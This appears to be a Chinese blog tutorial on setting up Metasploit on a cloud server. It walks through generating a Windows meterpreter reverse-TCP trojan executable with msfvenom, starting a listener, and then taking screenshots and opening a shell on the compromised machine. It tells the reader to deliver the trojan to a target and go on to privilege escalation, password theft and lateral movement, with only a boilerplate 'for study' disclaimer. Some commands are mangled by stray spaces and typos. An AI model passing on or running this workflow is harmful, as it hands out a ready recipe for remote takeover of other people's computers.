文章目录[隐藏]
- 1. 安装MFS
- 接下来的命令
- 2. 安装postgresql
- 3. MSF实战
在校园网环境下,由于各种限制,会导致本机虚拟机网络出现各种问题,解决起来非常繁琐,为此可以在服务器上安装MSF
1. 安装MFS
用xshell等工具连接你的服务器,并使用
1 | ifconfig |
---|
查看你的ip地址并记下来
接下来的命令
// 切换目录
cd /home
// 获取MSF安装脚本
curl https: //raw.githubusercontent.com /rapid7 /metasploit-omnibus /master /config /templates /metasploit-framework-wrappers /msfupdate.erb > msfinstall
// 修改权限
chmod 755 msfinstall
// 开始安装
. /msfinstall
2. 安装postgresql
因为MSF需要记录一些数据,依赖于postgresql,因此还需要安装
同样在当前home目录下
// 安装postgresql
apt-get install postgresql
// 切换到postgres用户
su postgres
// 登录postgresql数据库,首次登录没有密码
psql
// 修改数据库用户postgres的密码
password postgres
// 退出
q
// 初始化
msfdb init
3. MSF实战
// 生成小马文件
msfvenom -p windows /meterpreter /reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe
// 进入msf
msfconsole
// 监听
use exploit /multi /handle
// 设置payload
set payload windows /meterpreter /reverse_tcp
// 设置
set LHOST 0.0.0.0
set LPORT 服务器监听端口
// 运行
run
[ cc ]
<h3 >接下来的就是将木马文件传给靶机运行就行了 </h3 >
<h2 >获取服务端会话后可进行的一些操作 </h2 >
[ cc lang= "bash" ]
// 将会话维持
background
// 罗列会话
sessions
// 进入会话
sesions 会话 id
// 获取目标主机屏幕截图
screenshot
// 进入目标主机的Shell
shell
// 退出shell
exit
// 更多内容可以通过帮助查看
help
后续就是提权、抓密码、横向渗透的事情了,可以自由发挥
行云博客 - 免责申明 本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我联系处理。敬请谅解!
本文链接:https://www.xy586.top/235.html
转载请注明文章来源:行云博客 » 云服务器如何安装MFS环境